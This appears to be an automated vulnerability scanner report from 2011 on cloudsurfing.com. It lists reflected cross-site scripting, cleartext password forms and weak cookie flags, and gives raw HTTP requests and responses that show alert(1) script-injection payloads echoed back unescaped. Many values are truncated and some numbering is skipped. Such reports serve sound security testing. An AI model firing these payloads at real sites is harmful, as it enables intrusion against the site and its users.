1. Cross-site scripting (reflected)
1.1. http://www.cloudsurfing.com/auth/do_create [email parameter]
1.2. http://www.cloudsurfing.com/auth/do_create [name parameter]
1.3. http://www.cloudsurfing.com/auth/do_create [unique_id parameter]
1.4. http://www.cloudsurfing.com/auth/do_create [unique_id parameter]
1.5. http://www.cloudsurfing.com/auth/do_create [unique_id parameter]
1.6. http://www.cloudsurfing.com/auth/register/ [email parameter]
1.7. http://www.cloudsurfing.com/auth/register/ [unique_id parameter]
1.8. http://www.cloudsurfing.com/auth/register/ [unique_id parameter]
1.9. http://www.cloudsurfing.com/auth/register/ [unique_id parameter]
2. Cleartext submission of password
2.1. http://www.cloudsurfing.com/auth/do_create
2.2. http://www.cloudsurfing.com/auth/login
2.3. http://www.cloudsurfing.com/auth/register/
2.4. http://www.cloudsurfing.com/user/
2.5. http://www.cloudsurfing.com/user/favorites/
2.6. http://www.cloudsurfing.com/user/writereview/
3. Password field with autocomplete enabled
3.1. http://www.cloudsurfing.com/auth/do_create
3.2. http://www.cloudsurfing.com/auth/login
3.3. http://www.cloudsurfing.com/auth/register/
3.4. http://www.cloudsurfing.com/user/
3.5. http://www.cloudsurfing.com/user/favorites/
3.6. http://www.cloudsurfing.com/user/writereview/
4. Cross-domain script include
4.1. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/
4.2. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/google/
4.3. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/twitter/
5. Cookie without HttpOnly flag set
5.1. http://www.cloudsurfing.com/
5.2. http://www.cloudsurfing.com/auth/captcha/
5.3. http://www.cloudsurfing.com/auth/do_create
5.4. http://www.cloudsurfing.com/auth/login
5.5. http://www.cloudsurfing.com/browse/
5.6. http://www.cloudsurfing.com/community
5.7. http://www.cloudsurfing.com/news
5.8. http://www.cloudsurfing.com/recommendations
5.9. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/
5.10. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/google/
5.11. http://www.cloudsurfing.com/site/1369-Kosmix/buzz/twitter/
5.12. http://www.cloudsurfing.com/site/1369-kosmix/buzz
5.13. http://www.cloudsurfing.com/user/
5.14. http://www.cloudsurfing.com/user/favorites/
5.15. http://www.cloudsurfing.com/user/recommendations/
5.16. http://www.cloudsurfing.com/user/writereview/
9. HTML does not specify charset
9.1. http://www.cloudsurfing.com/auth/do_create
9.2. http://www.cloudsurfing.com/auth/register/
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
GET /auth/do_create?unique_id Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:24:21 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=a%3A0%3A%7B Set-Cookie: cloudsurfing=Ski5GeP Set-Cookie: cloudsurfing=uwqiz9J Vary: Accept-Encoding Content-Type: text/html Content-Length: 7327 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <input type="text" class="cloud_input" name="email" id="emailoginform2" value="ec05a\"><script>alert(1)< onblur="if (is_email_ok(this.value)) { $('#headingmessage2') else { $('#headingmessage2') ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
GET /auth/do_create?unique_id Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:23:47 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=%2Byypn Vary: Accept-Encoding Content-Type: text/html Content-Length: 7310 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <input type="text" class="cloud_input" name="name" id="name" value="fdbbd\"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
GET /auth/do_create?unique_id Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:30 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=CXy894u Vary: Accept-Encoding Content-Type: text/html Content-Length: 7805 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... return false; } if (StopPos - AtPos == 1) { return false; } return true; } // CHECK EMAIL FUNCTION FOR POPUP WINDOW function switch_to_login211148;alert(1)/ $.get('http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
GET /auth/do_create?unique_id Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:20 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=RfYS1JylB Vary: Accept-Encoding Content-Type: text/html Content-Length: 8061 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2d0fca"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
GET /auth/do_create?unique_id Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:26 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=oqzGtyr Vary: Accept-Encoding Content-Type: text/html Content-Length: 7821 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... POPUP WINDOW function switch_to_login278ded' $.get('http://www } ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email=36891"><script>alert(1)< Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:58 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7226 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <input type="text" class="cloud_input" name="email" id="emailoginform2" value="36891\"><script>alert(1)< onblur="if (is_email_ok(this.value)) { $('#headingmessage2') else { $('#headingmessage2') ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:14 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7630 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... N FOR POPUP WINDOW function switch_to_login2ca342' $.get('http://www } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:16 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7614 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... return false; } if (StopPos - AtPos == 1) { return false; } return true; } // CHECK EMAIL FUNCTION FOR POPUP WINDOW function switch_to_login267800;alert(1)/ $.get('http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:08 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7870 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2560e8"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
POST /auth/do_create HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 Content-Length: 60 unique_id=2&security_code |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:46 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=EiYiLPo Vary: Accept-Encoding Content-Type: text/html Content-Length: 7277 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <table border="0" cellspacing="0" cellpadding="2" align="center" width="345px"> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password" name="password" value="" onkeyup="if (this.value.length > 3) { $('#key1').attr('src', 'http://www.cloudsurfing else { $('#key1').attr('src', 'http://www.cloudsurfing onblur="if (this.value.length > 3) { $('#headingmessage2') else { $('#headingmessage2') </td> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password2" name="password2" value="" onkeyup="if (this.value.length > 3 && this.value != $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value == $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value.length < 4) { $('#key2').attr('src', 'http://www.cloudsurfing </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/login |
GET /auth/login HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:00 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=uXE Vary: Accept-Encoding Content-Type: text/html Content-Length: 20351 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> The one stop review source for web 2.0 apps, tools, service ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7182 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <table border="0" cellspacing="0" cellpadding="2" align="center" width="345px"> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password" name="password" value="" onkeyup="if (this.value.length > 3) { $('#key1').attr('src', 'http://www.cloudsurfing else { $('#key1').attr('src', 'http://www.cloudsurfing onblur="if (this.value.length > 3) { $('#headingmessage2') else { $('#headingmessage2') </td> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password2" name="password2" value="" onkeyup="if (this.value.length > 3 && this.value != $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value == $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value.length < 4) { $('#key2').attr('src', 'http://www.cloudsurfing </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/ |
GET /user/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:13 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=a%3A0%3A%7B Set-Cookie: cloudsurfing=iY68Rl1 Set-Cookie: cloudsurfing=lBh6eGV Set-Cookie: cloudsurfing=BjPtBtM5kL Set-Cookie: cloudsurfing=1cWbKfP Set-Cookie: cloudsurfing=E3Dzls%2BT Vary: Accept-Encoding Content-Type: text/html Content-Length: 35214 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/favorites/ |
GET /user/favorites/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:50 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=e3Uablr Set-Cookie: cloudsurfing=GxF4Rcx Set-Cookie: cloudsurfing=RryZwtX Set-Cookie: cloudsurfing=wWhUy1f Vary: Accept-Encoding Content-Type: text/html Content-Length: 35430 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /user/writereview/ |
GET /user/writereview/ HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:14:48 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=MR4Md0A Set-Cookie: cloudsurfing=52VUVmi Set-Cookie: cloudsurfing=IpzbMOna3 Set-Cookie: cloudsurfing=Ly08FkE Vary: Accept-Encoding Content-Type: text/html Content-Length: 35800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> My Web: user settings and activity, including reviews, rati ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/do_create |
POST /auth/do_create HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing Origin: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 Content-Length: 60 unique_id=2&security_code |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:21:46 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=EiYiLPo Vary: Accept-Encoding Content-Type: text/html Content-Length: 7277 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <table border="0" cellspacing="0" cellpadding="2" align="center" width="345px"> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password" name="password" value="" onkeyup="if (this.value.length > 3) { $('#key1').attr('src', 'http://www.cloudsurfing else { $('#key1').attr('src', 'http://www.cloudsurfing onblur="if (this.value.length > 3) { $('#headingmessage2') else { $('#headingmessage2') </td> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password2" name="password2" value="" onkeyup="if (this.value.length > 3 && this.value != $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value == $('#password').val()) { $('#key2').attr('src', 'http://www.cloudsurfing if (this.value.length < 4) { $('#key2').attr('src', 'http://www.cloudsurfing </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/login |
GET /auth/login HTTP/1.1 Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:22:00 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Set-Cookie: cloudsurfing=uXE Vary: Accept-Encoding Content-Type: text/html Content-Length: 20351 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title> The one stop review source for web 2.0 apps, tools, service ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <input type="hidden" name="noborder" value="1" /> ...[SNIP]... <td colspan="2" align="left"> <input tabindex="2" type="password" class="cloud_input" name="password" id="passwordloginform2" value=""> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cloudsurfing |
Path: | /auth/register/ |
GET /auth/register/?email= Host: www.cloudsurfing.com Proxy-Connection: keep-alive Referer: http://www.cloudsurfing X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=269690403 |
HTTP/1.1 200 OK Date: Wed, 18 May 2011 13:19:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 mod_jk/1.2.28 PHP/5.2.13 Phusion_Passenger/2.2.15 X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Content-Type: text/html Content-Length: 7182 <script type="text/javascript"> // CHECK EMAIL FUNCTION FOR POPUP WINDOW function is_email_ok(email) { AtPos = email.indexOf("@"); StopPos = email.lastIndexOf("."); if (email == "") ...[SNIP]... <div id="editcontent2" style="text-align:center; <form style="padding:0px;margin <table border="0" cellspacing="0" cellpadding="2" align="center" width="345px"> ...[SNIP]... <td colspan="2" align="left"> <input type="password" class="cloud_input" id="password" name="password" value="" onkeyup="if (this.value.length > 3) { $('#key1').attr('src', 'http://www.cloudsurfing else { $('#key1').attr('src', 